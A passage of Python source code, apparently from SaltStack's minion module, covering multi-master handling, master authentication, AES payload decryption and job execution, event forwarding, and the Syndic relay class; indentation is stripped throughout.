'Attempting to start a multimaster system with one master')
return False
minions = []
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
try:
minions.append(Minion(s_opts, 5, False))
except SaltClientError:
minions.append(s_opts)
return minions
def minions(self):
'''
Return a list of minion generators bound to the tune_in method
'''
ret = {}
minions = self._gen_minions()
for minion in minions:
if isinstance(minion, dict):
ret[minion['master']] = minion
else:
ret[minion.opts['master']] = {
'minion': minion,
'generator': minion.tune_in_no_block()}
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
module_refresh = False
pillar_refresh = False
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
last = time.time()
auth_wait = self.opts['acceptance_wait_time']
max_wait = auth_wait * 6
while True:
for minion in minions.values():
if isinstance(minion, dict):
continue
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
while True:
package = self.epull_sock.recv(zmq.NOBLOCK)
if package.startswith('module_refresh'):
module_refresh = True
elif package.startswith('pillar_refresh'):
pillar_refresh = True
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
pass
# get commands from each master
for master, minion in minions.items():
if 'generator' not in minion:
if time.time() - auth_wait > last:
last = time.time()
if auth_wait < max_wait:
auth_wait += auth_wait
try:
if not isinstance(minion, dict):
minions[master] = {'minion': minion}
t_minion = Minion(minion, 5, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
auth_wait = self.opts['acceptance_wait_time']
except SaltClientError:
continue
else:
continue
if module_refresh:
minion['minion'].module_refresh()
if pillar_refresh:
minion['minion'].pillar_refresh()
minion['generator'].next()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {0}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts)
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
else:
return
sreq = salt.payload.SREQ(self.opts['master_uri'])
try:
sreq.send('aes', self.crypticle.dumps(load))
except Exception:
pass
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, int(self.opts['random_reauth_delay']))
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None or not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
sdata = {'pid': os.getpid()}
sdata.update(data)
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = parse_args_and_kwargs(func, data['arg'], data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, list):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR: {0}'.format(exc)
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
except TypeError as exc:
trb = traceback.format_exc()
aspec = salt.utils.get_function_argspec(
minion_instance.functions[data['fun']]
)
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info. Possibly a missing '
'arguments issue: {2}').format(function_name,
exc,
aspec)
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = msg
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = parse_args_and_kwargs(func, data['arg'][ind], data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
sreq = salt.payload.SREQ(self.opts['master_uri'])
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
try:
ret_val = sreq.send('aes', self.crypticle.dumps(load))
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider incresing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
if isinstance(ret_val, string_types) and not ret_val:
# The master AES key has changed, reauth
self.authenticate()
ret_val = sreq.send('aes', self.crypticle.dumps(load))
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if not 'schedule' in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds != 'retry':
log.info('Authentication with master successful!')
break
log.info('Waiting for minion key to be accepted by the master.')
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self):
'''
Refresh the functions and returners.
'''
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
getpass.getuser()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
log.debug('Handling event {0!r}'.format(package))
try:
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh()
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leeks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to recieve on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'poller'):
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts):
self._syndic_interface = opts.get('interface')
self._syndic = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'to' not in data or 'arg' not in data:
return
data['to'] = int(data['to']) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'])
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.LocalClient(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self.context = zmq.Context()
# Start with the publish socket
# Share the poller with the event object
self.poller = self.local.event.poller
self.socket = self.context.socket(zmq.SUB)
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the recieve calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event %s', event['tag'])
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.is_jid(event['tag']) and 'return' in event['data']:
if not 'jid' in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = salt.utils.jid_load(
event['data']['jid'],
self.local.opts['cachedir'],
self.opts['hash_type'])
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if not 'retcode' in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed.
# This does not delete the poller just our reference to it.
del self.poller
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
if functions is None:
functions = salt.loader.minion_mods(self.opts)
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
